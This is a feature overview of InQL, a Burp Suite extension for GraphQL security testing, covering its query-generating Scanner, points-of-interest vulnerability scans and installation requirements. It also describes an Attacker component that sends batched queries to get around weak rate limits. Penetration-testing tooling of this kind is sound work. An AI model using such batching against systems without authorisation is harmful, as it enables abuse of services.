https://github.com/doyensec/inql

InQL is a robust, open-source Burp Suite extension for advanced GraphQL testing, offering intuitive vulnerability detection, customizable scans, and seamless Burp integration.

🌟 Features

The InQL user interface is equipped with two primary components: the Scanner and the Attacker.

🔎 Scanner

The Scanner is the core of InQL v5.0, where you can analyze a GraphQL endpoint or a local introspection schema file. It auto-generates all possible queries and mutations, organizing them into a structured view for your analysis.

✅ Customizable Scans

InQL v5.0 offers the flexibility to customize your scans. Adjust the depth of generated queries or the number of spaces used for indentation. You can also perform ‘Points of Interest’ scans to detect potential vulnerabilities in the GraphQL schema.

✅ Points of Interest Analysis

After running a Points of Interest scan, you are presented with a rich data set covering a variety of potential vulnerabilities. You can enable or disable these categories according to your needs.

✅ Enhanced Interactions with Burp

InQL v5.0 seamlessly integrates with Burp, enabling you to generate queries directly from any GraphQL request in Burp. You can also send auto-generated queries to other Burp tools for further analysis.

✅ Custom Headers

You have the ability to set custom headers per domain, with the domain list auto-populated from observed traffic.

⚔️ Attacker

The Attacker component lets you run batch GraphQL attacks, which can be useful for circumventing poorly implemented rate limits.

📝 Burp’s Native Message Editors

Burp’s native message editors now come with an additional ‘GraphQL’ tab, providing an efficient way to view and modify GraphQL requests.

⬇️ Installation

To successfully install InQL v5.0, ensure you meet the following requirements:

Burp:

• Support is only provided for the most recent version of Burp.
• Compatible with both “Professional” and “Community” editions.

Java:

• The Montoya API needs Java 17 or later.